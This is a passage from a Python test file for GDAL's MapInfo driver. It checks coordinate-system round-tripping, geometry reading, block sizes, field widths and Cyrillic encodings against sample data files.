ds.CreateLayer(\"foo\", srs=srs)\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n ds = None\n f = gdal.VSIFOpenL(mif_filename, \"rb\")\n data = gdal.VSIFReadL(1, 10000, f).decode(\"ascii\")\n gdal.VSIFCloseL(f)\n gdal.Unlink(mif_filename)\n gdal.Unlink(mif_filename.with_suffix(\".mid\"))\n data = data[data.find(\"CoordSys\") :]\n data = data[0 : data.find(\"\\n\")]\n return data\n\n\ndef test_ogr_mitab_35(tmp_vsimem):\n\n # Local/non-earth\n srs = osr.SpatialReference()\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys NonEarth Units \"m\"'\n\n srs = osr.SpatialReference('LOCAL_CS[\"foo\"]')\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys NonEarth Units \"m\"'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert wkt in (\n 'LOCAL_CS[\"Nonearth\",UNIT[\"Meter\",1]]',\n 'LOCAL_CS[\"Nonearth\",UNIT[\"Meter\",1],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]',\n )\n\n # Test units\n for mif_unit in [\n \"mi\",\n \"km\",\n \"in\",\n \"ft\",\n \"yd\",\n \"mm\",\n \"cm\",\n \"m\",\n \"survey ft\",\n \"nmi\",\n \"li\",\n \"ch\",\n \"rd\",\n ]:\n coordsys = 'CoordSys NonEarth Units \"%s\"' % mif_unit\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n # print(srs)\n got_coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == got_coordsys, srs\n\n # Geographic\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 104\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 104\"\n\n # Projected\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(32631)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 8, 104, \"m\", 3, 0, 0.9996, 500000, 0'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"unnamed\",GEOGCS[\"unnamed\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",3],PARAMETER[\"scale_factor\",0.9996],PARAMETER[\"false_easting\",500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 8, 104, \"m\", 3, 0, 0.9996, 500000, 0'\n\n # Test round-tripping of projection methods and a few units\n for coordsys in [\n \"CoordSys Earth Projection 1, 104\",\n 'CoordSys Earth Projection 2, 104, \"survey ft\", 1, 2',\n 'CoordSys Earth Projection 3, 104, \"ft\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 4, 104, \"m\", 1, 90, 90',\n 'CoordSys Earth Projection 5, 104, \"m\", 1, 90, 90',\n 'CoordSys Earth Projection 6, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 7, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 8, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 9, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 10, 104, \"m\", 1',\n 'CoordSys Earth Projection 11, 104, \"m\", 1',\n 'CoordSys Earth Projection 12, 104, \"m\", 1',\n 'CoordSys Earth Projection 13, 104, \"m\", 1',\n 'CoordSys Earth Projection 14, 104, \"m\", 1',\n 'CoordSys Earth Projection 15, 104, \"m\", 1',\n 'CoordSys Earth Projection 16, 104, \"m\", 1',\n 'CoordSys Earth Projection 17, 104, \"m\", 1',\n 'CoordSys Earth Projection 18, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 19, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 20, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 21, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 22, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 23, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 24, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 25, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 26, 104, \"m\", 1, 2',\n 'CoordSys Earth Projection 27, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 28, 104, \"m\", 1, 2, 90',\n # 'CoordSys Earth Projection 29, 104, \"m\", 1, 90, 90', # alias of 4\n 'CoordSys Earth Projection 30, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 31, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 32, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 33, 104, \"m\", 1, 2, 3, 4',\n ]:\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n # print(srs)\n got_coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n # if got_coordsys.find(' Bounds') >= 0:\n # got_coordsys = got_coordsys[0:got_coordsys.find(' Bounds')]\n assert coordsys == got_coordsys, srs\n\n # Test TOWGS84\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4322)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 103\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert wkt in (\n 'GEOGCS[\"unnamed\",DATUM[\"WGS_1972\",SPHEROID[\"WGS 72\",6378135,298.26]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]',\n 'GEOGCS[\"unnamed\",DATUM[\"World_Geodetic_System_1972\",SPHEROID[\"WGS 72\",6378135,298.26]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]',\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 103\"\n\n # Test Lambert 93\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(2154)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000'\n )\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n assert srs.GetAuthorityCode(None) == \"2154\"\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000'\n )\n\n srs = osr.SpatialReference(\n 'PROJCS[\"RGF93 / Lambert-93\",GEOGCS[\"RGF93\",DATUM[\"Reseau_Geodesique_Francais_1993\",SPHEROID[\"GRS 80\",6378137,298.257222101]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433]],PROJECTION[\"Lambert_Conformal_Conic_2SP\"],PARAMETER[\"standard_parallel_1\",49.00000000002],PARAMETER[\"standard_parallel_2\",44],PARAMETER[\"latitude_of_origin\",46.5],PARAMETER[\"central_meridian\",3],PARAMETER[\"false_easting\",700000],PARAMETER[\"false_northing\",6600000],UNIT[\"Meter\",1.0],AUTHORITY[\"EPSG\",\"2154\"]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000'\n )\n with gdal.config_option(\"MITAB_BOUNDS_FILE\", \"data/mitab/mitab_bounds.txt\"):\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000 Bounds (75000, 6000000) (1275000, 7200000)'\n )\n\n # http://trac.osgeo.org/gdal/ticket/4115\n srs = get_srs_from_coordsys(tmp_vsimem, 'CoordSys Earth Projection 10, 157, \"m\", 0')\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"WGS 84 / Pseudo-Mercator\",GEOGCS[\"WGS 84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4326\"]],PROJECTION[\"Mercator_1SP\"],PARAMETER[\"central_meridian\",0],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH],EXTENSION[\"PROJ4\",\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0 +lon_0=0 +x_0=0 +y_0=0 +k=1 +units=m +nadgrids=@null +wktext +no_defs\"]]'\n )\n # We don't round-trip currently\n\n # MIF 999\n srs = osr.SpatialReference(\n \"\"\"GEOGCS[\"unnamed\",\n DATUM[\"MIF 999,1,1,2,3\",\n SPHEROID[\"WGS 72\",6378135,298.26]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 999, 1, 1, 2, 3\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"MIF 999,1,1,2,3\",SPHEROID[\"WGS 72\",6378135,298.26],TOWGS84[1,2,3,0,0,0,0]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n\n # MIF 9999\n srs = osr.SpatialReference(\n \"\"\"GEOGCS[\"unnamed\",\n DATUM[\"MIF 9999,1,1,2,3,4,5,6,7,3\",\n SPHEROID[\"WGS 72\",6378135,298.26]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 9999, 1, 1, 2, 3, 4, 5, 6, 7, 3\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"MIF 9999,1,1,2,3,4,5,6,7,3\",SPHEROID[\"WGS 72\",6378135,298.26],TOWGS84[1,2,3,-4,-5,-6,7]],PRIMEM[\"non-Greenwich\",3],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n\n # Test EPSG:2393 / KKJ\n srs = osr.SpatialReference(\n \"\"\"PROJCS[\"KKJ / Finland Uniform Coordinate System\",GEOGCS[\"KKJ\",DATUM[\"Kartastokoordinaattijarjestelma_1966\",SPHEROID[\"International 1924\",6378388,297,AUTHORITY[\"EPSG\",\"7022\"]],AUTHORITY[\"EPSG\",\"6123\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4123\"]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",27],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",3500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Northing\",NORTH],AXIS[\"Easting\",EAST],AUTHORITY[\"EPSG\",\"2393\"]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 24, 1016, \"m\", 27, 0, 1, 3500000, 0'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"unnamed\",GEOGCS[\"unnamed\",DATUM[\"Kartastokoordinaattijarjestelma_1966\",SPHEROID[\"International 1924\",6378388,297]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",27],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",3500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 24, 1016, \"m\", 27, 0, 1, 3500000, 0'\n\n\n###############################################################################\n# Test opening and modifying a file with polygons created with MapInfo that consists of\n# a single object block, without index block\n\n\ndef test_ogr_mitab_36(tmp_path):\n\n # Test modifying a new object\n for ext in (\"tab\", \"dat\", \"id\", \"map\"):\n shutil.copy(f\"data/mitab/polygon_without_index.{ext}\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"polygon_without_index.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n g = f.GetGeometryRef()\n ring = g.GetGeometryRef(0)\n ring.SetPoint_2D(1, ring.GetX(1) + 100, ring.GetY())\n g = g.Clone()\n f.SetGeometry(g)\n lyr.SetFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"polygon_without_index.tab\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n got_g = f.GetGeometryRef()\n ogrtest.check_feature_geometry(f, got_g, max_error=0.1)\n while True:\n f = lyr.GetNextFeature()\n if f is None:\n break\n ds = None\n\n\n###############################################################################\n# Simple testing of Seamless tables\n\n\ndef test_ogr_mitab_37():\n\n ds = ogr.Open(\"data/mitab/seamless.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 4\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 4294967297 and f.id == \"1\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 4294967298 and f.id == \"2\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 8589934593 and f.id == \"3\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 8589934594 and f.id == \"4\"\n\n f = lyr.GetFeature(4294967297)\n assert f.GetFID() == 4294967297 and f.id == \"1\"\n\n f = lyr.GetFeature(8589934594)\n assert f.GetFID() == 8589934594 and f.id == \"4\"\n\n f = lyr.GetFeature(8589934594 + 1)\n assert f is None\n\n f = lyr.GetFeature(4294967297 * 2 + 1)\n assert f is None\n\n\n###############################################################################\n# Open MIF with MID with TAB delimiter and empty first field (#5405)\n\n\ndef test_ogr_mitab_38():\n\n ds = ogr.Open(\"data/mitab/empty_first_field_with_tab_delimiter.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if f[\"field1\"] != \"\" or f[\"field2\"] != \"foo\":\n f.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Read various geometry types from .mif\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_39():\n\n ds = ogr.Open(\"data/mitab/all_geoms.mif\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Read various geometry types from .mif but potentially truncated\n\n\ndef test_ogr_mitab_40(tmp_vsimem):\n\n content = open(\"data/mitab/all_geoms.mif\", \"rt\").read()\n\n for i in range(len(content)):\n gdal.FileFromMemBuffer(tmp_vsimem / \"ogr_mitab_40.mif\", content[0:i])\n with gdal.quiet_errors():\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_40.mif\")\n if ds is not None:\n lyr = ds.GetLayer(0)\n for _ in lyr:\n pass\n\n\n###############################################################################\n# Read various geometry types from .tab\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_41():\n\n ds = ogr.Open(\"data/mitab/all_geoms.tab\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Read various geometry types from .tab with block size = 32256\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_42():\n\n ds = ogr.Open(\"/vsizip/data/mitab/all_geoms_block_32256.zip\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Test creating tab with block size = 32256\n\n\ndef test_ogr_mitab_43(tmp_vsimem):\n\n src_ds = gdal.OpenEx(\"/vsizip/data/mitab/all_geoms_block_32256.zip\")\n gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_512.tab\", src_ds, format=\"MapInfo File\"\n )\n gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_32256.tab\",\n src_ds,\n format=\"MapInfo File\",\n datasetCreationOptions=[\"BLOCKSIZE=32256\"],\n )\n with gdal.quiet_errors():\n out_ds = gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_invalid.tab\",\n src_ds,\n format=\"MapInfo File\",\n datasetCreationOptions=[\"BLOCKSIZE=32768\"],\n )\n assert out_ds is None\n gdal.Unlink(tmp_vsimem / \"all_geoms_block_invalid.dat\")\n src_ds = None\n\n size = gdal.VSIStatL(tmp_vsimem / \"all_geoms_block_512.map\").size\n assert size == 7168\n\n size = gdal.VSIStatL(tmp_vsimem / \"all_geoms_block_32256.map\").size\n assert size == 161280\n\n ds = ogr.Open(tmp_vsimem / \"all_geoms_block_32256.tab\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(tmp_vsimem / \"all_geoms_block_512.tab\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Test limitation on width and precision of numeric fields in creation (#6392)\n\n\ndef test_ogr_mitab_44(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_44.mif\"\n )\n lyr = ds.CreateLayer(\"test\")\n fld_defn = ogr.FieldDefn(\"test\", ogr.OFTReal)\n fld_defn.SetWidth(30)\n fld_defn.SetPrecision(29)\n lyr.CreateField(fld_defn)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_44.mif\")\n lyr = ds.GetLayer(0)\n fld_defn = lyr.GetLayerDefn().GetFieldDefn(0)\n assert fld_defn.GetWidth() == 20 and fld_defn.GetPrecision() == 16\n ds = None\n\n\n###############################################################################\n# Test read/write MapInfo layers with encoding specified\n\n\n@pytest.mark.parametrize(\"frmt\", (\"MIF\", \"TAB\"))\n@pytest.mark.parametrize(\"lyrCount\", (1, 2))\ndef test_ogr_mitab_45(tmp_vsimem, frmt, lyrCount):\n\n lyrNames = [\"lyr1\", \"lyr2\"]\n fldNames = [\"field1\", \"абвгдежзийклмнопрстуфхцчшщьъэюя\"]\n featNames = [\"аз\", \"буки\", \"веди\"]\n\n if lyrCount == 1:\n dsName = tmp_vsimem / f\"ogr_mitab_45_{frmt}_{lyrCount}.{frmt.lower()}\"\n else:\n dsName = tmp_vsimem / f\"ogr_mitab_45_{frmt}_{lyrCount}\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n dsName, options=[\"FORMAT=\" + frmt]\n )\n\n assert ds is not None, \"Can't create dataset: \" + dsName\n\n for i in range(lyrCount):\n lyr = ds.CreateLayer(lyrNames[i], options=[\"ENCODING=CP1251\"])\n assert lyr is not None, f\"Can't create layer {lyrNames[i]} for {dsName}\"\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n for fldName in fldNames:\n fld_defn = ogr.FieldDefn(fldName, ogr.OFTString)\n fld_defn.SetWidth(254)\n lyr.CreateField(fld_defn)\n\n for featName in featNames:\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (25 72)\"))\n for fldName in fldNames:\n featValue = fldName + \" \" + featName\n feat.SetField(fldName, featValue)\n lyr.CreateFeature(feat)\n ds = None\n\n # reopen and check\n ds = ogr.Open(dsName)\n assert ds is not None, \"Can't reopen dataset: \" + dsName\n\n for i in range(lyrCount):\n lyr = ds.GetLayer(i)\n assert lyr is not None, \"Can't get layer \" + lyrNames[i] + \" from \" + dsName\n\n for fldN, expectedName in enumerate(fldNames):\n fldName = lyr.GetLayerDefn().GetFieldDefn(fldN).GetName()\n assert fldName == expectedName, (\n \"Can't get field name\\n\" + ' result name: \"' + fldName + '\"\\n'\n ' expected name: \"' + expectedName + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n\n for featName in featNames:\n feat = lyr.GetNextFeature()\n for fldN, fldName in enumerate(fldNames):\n expectedValue = fldName + \" \" + featName\n # column value by number\n value = feat.GetField(fldN)\n assert value == expectedValue, (\n \"Can't get field value by number\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n # column value by name\n value = feat.GetField(fldNames[fldN])\n assert value == expectedValue, (\n \"Can't get field value by name\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n\n\n###############################################################################\n# Test read MapInfo layers with encoding specified\n\n\n@pytest.mark.parametrize(\"fname\", (\"tab-win1251.TAB\", \"win1251.mif\"))\ndef test_ogr_mitab_46(fname):\n\n fldNames = [\"Поле_А\", \"Поле_Б\", \"Поле_В\", \"Поле_Г\", \"Поле_Д\"]\n fldVal = [\n [\"Значение А\", \"Значение Б\", \"Значение В\", \"Значение Г\", \"Значение Д\"],\n [\"Значение 1\", \"Значение 2\", \"Значение 3\", \"Значение 4\", \"Значение 5\"],\n [\"Полигон\", \"Синий\", \"Заливка\", \"А а Б б\", \"ЪЫЁЩ\"],\n ]\n\n dsName = os.path.join(\"data/mitab\", fname)\n\n ds = ogr.Open(dsName)\n assert ds is not None, \"Can't open dataset: \" + dsName\n\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + dsName\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n for fldN, expectedName in enumerate(fldNames):\n fldName = lyr.GetLayerDefn().GetFieldDefn(fldN).GetName()\n assert fldName == expectedName, (\n \"Can't get field\\n\" + ' result name: \"' + fldName + '\"\\n'\n ' expected name: \"' + expectedName + '\"\\n'\n \" from dataset :\" + dsName\n )\n\n for featFldVal in fldVal:\n feat = lyr.GetNextFeature()\n for fldN, fldName in enumerate(fldNames):\n expectedValue = featFldVal[fldN]\n # column value by number\n value = feat.GetField(fldN)\n assert value == expectedValue, (\n \"Can't get field value by number\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from dataset :\" + dsName\n )\n # column value by name\n value = feat.GetField(fldName)\n assert value == expectedValue, (\n \"Can't get field value by name\\n\" + ' result value: \"' + value + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from dataset :\" + dsName\n )\n\n\n###############################################################################\n# Test opening a dataset with a .ind file\n\n\ndef test_ogr_mitab_47(tmp_vsimem):\n\n ds = ogr.Open(\"data/mitab/poly_indexed.tab\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"PRFEDEA = '35043413'\")\n assert lyr.GetFeatureCount() == 1\n\n for ext in (\"tab\", \"dat\", \"map\", \"id\"):\n gdal.FileFromMemBuffer(\n tmp_vsimem / f\"poly_indexed.{ext}\",\n open(\"data/mitab/poly_indexed.\" + ext, \"rb\").read(),\n )\n ds = ogr.Open(tmp_vsimem / \"poly_indexed.tab\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"PRFEDEA = '35043413'\")\n assert lyr.GetFeatureCount() == 1\n ds = None\n\n\n###############################################################################\n# Test writing and reading LCC_1SP\n\n\ndef test_ogr_mitab_48(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_vsimem / \"test.mif\")\n sr = osr.SpatialReference()\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"NTF (Paris) / France IV (deprecated)\",\n GEOGCS[\"NTF (Paris)\",\n DATUM[\"Nouvelle_Triangulation_Francaise_Paris\",\n SPHEROID[\"Clarke 1880 (IGN)\",6378249.2,293.4660212936269,\n AUTHORITY[\"EPSG\",\"7011\"]],\n TOWGS84[-168,-60,320,0,0,0,0],\n AUTHORITY[\"EPSG\",\"6807\"]],\n PRIMEM[\"Paris\",2.33722917,\n AUTHORITY[\"EPSG\",\"8903\"]],\n UNIT[\"grad\",0.01570796326794897,\n AUTHORITY[\"EPSG\",\"9105\"]],\n AUTHORITY[\"EPSG\",\"4807\"]],\n PROJECTION[\"Lambert_Conformal_Conic_1SP\"],\n PARAMETER[\"latitude_of_origin\",46.85],\n PARAMETER[\"central_meridian\",0],\n PARAMETER[\"scale_factor\",0.99994471],\n PARAMETER[\"false_easting\",234.358],\n PARAMETER[\"false_northing\",4185861.369],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"X\",EAST],\n AXIS[\"Y\",NORTH],\n AUTHORITY[\"EPSG\",\"27584\"]]\"\"\"\n )\n lyr = ds.CreateLayer(\"foo\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"foo\", ogr.OFTString))\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"test.mif\")\n lyr = ds.GetLayer(0)\n sr_got = lyr.GetSpatialRef()\n ds = None\n\n sr_expected = osr.SpatialReference()\n sr_expected.SetFromUserInput(\n \"\"\"PROJCS[\"unnamed\",\n GEOGCS[\"unnamed\",\n DATUM[\"NTF_Paris_Meridian\",\n SPHEROID[\"Clarke 1880 (modified for IGN)\",6378249.2,293.4660213],\n TOWGS84[-168,-60,320,0,0,0,0]],\n PRIMEM[\"Paris\",2.33722917],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_1SP\"],\n PARAMETER[\"latitude_of_origin\",42.165],\n PARAMETER[\"central_meridian\",0],\n PARAMETER[\"scale_factor\",0.99994471],\n PARAMETER[\"false_easting\",234.358],\n PARAMETER[\"false_northing\",4185861.369],\n 